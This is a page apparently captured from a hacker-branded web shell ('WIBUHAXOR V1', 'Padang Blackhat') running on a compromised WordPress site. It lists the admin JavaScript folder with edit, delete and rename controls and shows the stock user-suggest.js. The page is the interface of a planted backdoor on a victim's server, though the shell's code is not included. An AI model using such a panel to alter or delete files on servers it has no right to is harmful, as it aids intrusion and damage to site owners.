-
WIBUHAX0R1337
-
/
home
/
cideo
/
www
/
wp-adminVIp
/
js
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
widgets
--
NONE
accordion.js
2.869KB
Edit File
Delete File
Rename
accordion.min.js
0.829KB
Edit File
Delete File
Rename
application-passwords.min.js
2.932KB
Edit File
Delete File
Rename
auth-app.min.js
2.035KB
Edit File
Delete File
Rename
code-editor.min.js
3.011KB
Edit File
Delete File
Rename
color-picker.js
9.539KB
Edit File
Delete File
Rename
color-picker.min.js
3.404KB
Edit File
Delete File
Rename
common.min.js
20.041KB
Edit File
Delete File
Rename
custom-background.min.js
1.178KB
Edit File
Delete File
Rename
customize-nav-menus.js
106.114KB
Edit File
Delete File
Rename
dashboard.min.js
8.591KB
Edit File
Delete File
Rename
editor-expand.js
41.608KB
Edit File
Delete File
Rename
farbtastic.js
7.509KB
Edit File
Delete File
Rename
gallery.js
5.53KB
Edit File
Delete File
Rename
gallery.min.js
3.743KB
Edit File
Delete File
Rename
inline-edit-post.js
17.342KB
Edit File
Delete File
Rename
inline-edit-post.min.js
7.942KB
Edit File
Delete File
Rename
inline-edit-tax.js
7.614KB
Edit File
Delete File
Rename
inline-edit-tax.min.js
2.927KB
Edit File
Delete File
Rename
language-chooser.js
0.869KB
Edit File
Delete File
Rename
language-chooser.min.js
0.413KB
Edit File
Delete File
Rename
link.js
3.894KB
Edit File
Delete File
Rename
link.min.js
1.701KB
Edit File
Delete File
Rename
media-gallery.js
1.272KB
Edit File
Delete File
Rename
media-gallery.min.js
0.597KB
Edit File
Delete File
Rename
media-upload.min.js
1.125KB
Edit File
Delete File
Rename
media.min.js
2.359KB
Edit File
Delete File
Rename
nav-menu.min.js
25.424KB
Edit File
Delete File
Rename
password-strength-meter.js
4.137KB
Edit File
Delete File
Rename
password-strength-meter.min.js
1.097KB
Edit File
Delete File
Rename
post.js
39.229KB
Edit File
Delete File
Rename
post.min.js
18.654KB
Edit File
Delete File
Rename
postbox.js
18.397KB
Edit File
Delete File
Rename
postbox.min.js
6.548KB
Edit File
Delete File
Rename
privacy-tools.js
10.654KB
Edit File
Delete File
Rename
privacy-tools.min.js
5.021KB
Edit File
Delete File
Rename
revisions.js
33.125KB
Edit File
Delete File
Rename
set-post-thumbnail.min.js
0.605KB
Edit File
Delete File
Rename
site-health.js
12.763KB
Edit File
Delete File
Rename
site-health.min.js
6.093KB
Edit File
Delete File
Rename
svg-painter.min.js
2.332KB
Edit File
Delete File
Rename
tags-box.js
10.879KB
Edit File
Delete File
Rename
tags-box.min.js
3.005KB
Edit File
Delete File
Rename
tags-suggest.js
5.532KB
Edit File
Delete File
Rename
tags-suggest.min.js
2.192KB
Edit File
Delete File
Rename
tags.js
4.773KB
Edit File
Delete File
Rename
tags.min.js
1.965KB
Edit File
Delete File
Rename
theme.min.js
26.421KB
Edit File
Delete File
Rename
updates.min.js
40.495KB
Edit File
Delete File
Rename
user-profile.min.js
6.042KB
Edit File
Delete File
Rename
user-suggest.js
2.247KB
Edit File
Delete File
Rename
word-count.min.js
1.494KB
Edit File
Delete File
Rename
xfn.js
0.723KB
Edit File
Delete File
Rename
xfn.min.js
0.447KB
Edit File
Delete File
Rename
/** * Suggests users in a multisite environment. * * For input fields where the admin can select a user based on email or * username, this script shows an autocompletion menu for these inputs. Should * only be used in a multisite environment. Only users in the currently active * site are shown. * * @since 3.4.0 * @output wp-admin/js/user-suggest.js */ /* global ajaxurl, current_site_id, isRtl */ (function( $ ) { var id = ( typeof current_site_id !== 'undefined' ) ? '&site_id=' + current_site_id : ''; $( function() { var position = { offset: '0, -1' }; if ( typeof isRtl !== 'undefined' && isRtl ) { position.my = 'right top'; position.at = 'right bottom'; } /** * Adds an autocomplete function to input fields marked with the class * 'wp-suggest-user'. * * A minimum of two characters is required to trigger the suggestions. The * autocompletion menu is shown at the left bottom of the input field. On * RTL installations, it is shown at the right top. Adds the class 'open' to * the input field when the autocompletion menu is shown. * * Does a backend call to retrieve the users. * * Optional data-attributes: * - data-autocomplete-type (add, search) * The action that is going to be performed: search for existing users * or add a new one. Default: add * - data-autocomplete-field (user_login, user_email) * The field that is returned as the value for the suggestion. * Default: user_login * * @see wp-admin/includes/admin-actions.php:wp_ajax_autocomplete_user() */ $( '.wp-suggest-user' ).each( function(){ var $this = $( this ), autocompleteType = ( typeof $this.data( 'autocompleteType' ) !== 'undefined' ) ? $this.data( 'autocompleteType' ) : 'add', autocompleteField = ( typeof $this.data( 'autocompleteField' ) !== 'undefined' ) ? $this.data( 'autocompleteField' ) : 'user_login'; $this.autocomplete({ source: ajaxurl + '?action=autocomplete-user&autocomplete_type=' + autocompleteType + '&autocomplete_field=' + autocompleteField + id, delay: 500, minLength: 2, position: position, open: function() { $( this ).addClass( 'open' ); }, close: function() { $( this ).removeClass( 'open' ); } }); }); }); })( jQuery );
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat